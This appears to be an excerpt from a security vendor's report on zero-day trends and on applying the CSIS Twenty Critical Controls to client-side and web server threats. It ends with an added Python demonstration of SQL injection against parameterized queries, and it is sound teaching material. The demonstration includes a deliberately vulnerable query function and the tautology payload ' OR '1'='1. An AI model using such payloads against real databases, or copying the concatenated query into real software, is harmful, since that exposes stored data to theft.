The implication of increasing duplicate discoveries is fairly alarming, in that the main mitigation for vulnerabilities of this type is patching, which is an invalid strategy for protecting against zero-day exploits. There is a heightened risk from cyber criminals, who can discover zero-day vulnerabilities and exploit them for profit. Add to this that software vendors have not necessarily lowered their average time for patching vulnerabilities reported to them, and that TippingPoint is aware of a number of vulnerabilities that were reported to vendors two years ago and are still awaiting a patch.

http://www.zerodayinitiative.com/advisories/upcoming/

This makes zero-day exploits in client-side applications one of the most significant threats to your network, and requires that you put in place additional information security measures and controls to complement your vulnerability assessment and remediation activities.


Best Practices in Mitigation and Control of the Top Risks

A few weeks ago, the Center for Strategic and International Studies published an updated version of the Twenty Critical Controls for Effective Cyber Defense.

http://csis.org/files/publication/Twenty_Critical_Controls_for_Effective_Cyber_Defense_CAG.pdf

These controls reflect the consensus of many of the nation's top cyber defenders and attackers on which specific controls must be implemented first to mitigate known cyber threats.

One of the most valuable uses of this report is to help organizations deploying the Twenty Critical Security Controls to be certain that no critical new attacks have been found that would force substantial changes in the Twenty Controls, and at the same time to help people who are implementing the Twenty Critical Security Controls to focus their attention on the elements of the controls that need to be completed most immediately.

The key elements of these attacks and associated Controls:

- User applications have vulnerabilities that can be exploited remotely.
  Controls 2 (Inventory of Software), 3 (Secure Configurations), and 10 (Vulnerability Assessment and Remediation) can ensure that vulnerable software is accounted for, identified for defensive planning, and remediated in a timely manner. Control 5 (Boundary Defenses) can provide some prevention/detection capability when attacks are launched.

- There is an increasing number of zero-days in these types of applications.
  Control 12 (Malware Defenses) is the most effective at mitigating many of these attacks because it can ensure that malware entering the network is effectively contained. Controls 2, 3, and 10 have minimal impact on zero-day exploits, and Control 5 can provide some prevention/detection capabilities against zero-days as well as known exploits.

- Successful exploitation grants the attacker the same privileges on the network as the user and/or host that is compromised.
  Control 5 (Boundary Defenses) can ensure that compromised host systems (portable and static) can be contained. Controls 8 (Controlled Use of Administrative Privileges) and 9 (Controlled Access) limit what access the attacker has inside the enterprise once they have successfully exploited a user application.

- The attacker is masquerading as a legitimate user but is often performing actions that are not typical for that user.
  Controls 6 (Audit Logs) and 11 (Account Monitoring and Control) can help identify potentially malicious or suspicious behavior, and Control 18 (Incident Response Capability) can assist in both detection and recovery from a compromise.

Critical Controls - As Applied to HTTP Server Threats

As discussed previously, web application vulnerabilities and server-side HTTP threats pose a serious threat not only to the web servers you control, but also to the servers that your users visit in day-to-day activities. Trends have indicated that SQL injection attacks are rising rapidly. SQL injection attacks are only valid if an application is written in such a way as to allow them; vulnerability is not a matter of configuration or (usually) access control.

The key elements of these attacks and associated Controls:

- Web applications have vulnerabilities that can be easily discovered and exploited remotely.
  Control 7 (Application Software Security) is perhaps the most critical control regarding these types of attacks. Application developers should ensure that all input received from remote sources is sanitized of data meaningful to backend database systems. Control 5 (Boundary Defenses) can ensure that the appropriate layered protections are in place to prevent/detect attacks aimed at your web servers. Controls 2 (Inventory of Software), 3 (Secure Configurations), and 10 (Vulnerability Assessment and Remediation) can ensure that vulnerable applications are accounted for, identified for defensive planning, and remediated in a timely manner.

- Successful exploitation grants the attacker the ability to put malicious code on the server and attempt to compromise all clients that browse that server.
  Control 6 (Audit Logs) can assist in identifying when someone has compromised your web server. Control 18 (Incident Response Capability) can help mitigate the impact of, and assist in recovery from, attacks against vulnerable applications.
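One way to meet the Control 7 guidance above, as an added example that is not from the report: the first lookup builds the statement by concatenating remote input, so a value containing a quote and an OR clause rewrites the query and returns every row; the second passes the value as a bound parameter, which the driver never interprets as SQL, so the same input simply matches nothing and no quote-stripping is needed. The table, rows and inputs are constructed, and SQLite stands in for the backend database.

```python
import sqlite3

def _open_db() -> sqlite3.Connection:
    """Constructed sample data: an in-memory users table with two accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "admin"), ("bob", "staff")])
    return db

def lookup_vulnerable(db: sqlite3.Connection, name: str) -> list:
    """Remote input is spliced into the query text, so it can change what the
    statement means: the Control 7 failure the report describes."""
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db: sqlite3.Connection, name: str) -> list:
    """Remote input travels as a bound parameter: the driver treats it strictly
    as a string value, never as part of the statement."""
    return db.execute("SELECT name, role FROM users WHERE name = ?",
                      (name,)).fetchall()

# A textbook tautology input, constructed for the demonstration.
TAUTOLOGY = "' OR '1'='1"

def demo() -> dict:
    db = _open_db()
    return {
        "normal_vuln": lookup_vulnerable(db, "alice"),
        "normal_param": lookup_parameterized(db, "alice"),
        "injected_vuln": lookup_vulnerable(db, TAUTOLOGY),      # every row leaks
        "injected_param": lookup_parameterized(db, TAUTOLOGY),  # no row matches
    }

if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```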

Corporate Headquarters: 7501B North Capital of Texas Hwy., Austin, Texas 78731 USA
European Headquarters: Herengracht 466, 2nd Floor, 1017 CA Amsterdam
Asia Pacific Headquarters: 47 Scotts Road, #11-03 Goldbell Towers